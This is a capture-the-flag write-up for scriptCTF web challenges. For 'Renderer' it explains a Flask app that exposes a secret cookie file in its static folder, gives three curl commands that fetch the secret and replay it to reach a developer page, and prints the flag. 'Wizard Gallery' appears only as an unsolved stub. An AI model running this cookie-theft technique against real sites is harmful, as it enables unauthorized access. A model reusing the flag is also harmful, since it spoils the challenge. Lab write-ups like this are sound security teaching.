# web ## Challenges ### Renderer

> Introducing Renderer! A free-to-use app to render your images! > > * [chall.zip](https://storage.googleapis.com/scriptctf_challenges/Web/Renderer/chall.zip) ``` unzip -l chall.zip Archive: chall.zip Length Date Time Name --------- ---------- ----- ---- 1790 2025-07-21 08:39 app.py 0 2025-07-18 10:31 templates/ 380 2025-07-18 10:31 templates/upload.html 390 2025-07-18 10:49 templates/display.html 0 2025-07-18 10:38 static/ 0 2025-07-21 08:37 static/uploads/ 0 2025-07-21 08:41 static/uploads/secrets/ 0 2025-07-21 08:41 static/uploads/secrets/secret_cookie.txt 20 2025-07-21 08:42 flag.txt --------- ------- 2580 9 files ```

Read a "secret" file that's stored in a directory that Flask automatically exposes via static file serving. 1. Storing secrets in the static/ directory (which Flask serves publicly) 2. Not implementing proper access control

# Step 1: Trigger secret generation (this will fail but create the secret)
curl "http://play.scriptsorcerers.xyz:10188/developer"

# Step 2: IMMEDIATELY read the newly generated secret
SECRET=$(curl -s "http://play.scriptsorcerers.xyz:10188/static/uploads/secrets/secret_cookie.txt")

# Step 3: Use the secret before it gets regenerated
curl -H "Cookie: developer_secret_cookie=$SECRET" "http://play.scriptsorcerers.xyz:10188/developer"

* `scriptCTF{my_c00k135_4r3_n0t_s4f3!_edd23d3198a4}` ### Wizard Gallery

> The council's top priority is to protect the flag, no matter the cost. Oh hey look, it's a photo gallery. What could go wrong? > > * [Wizard-Gallery.zip](https://storage.googleapis.com/scriptctf_challenges/Web/Wizard-Gallery/Wizard-Gallery.zip) {% hint style="info" %} breh {% endhint %}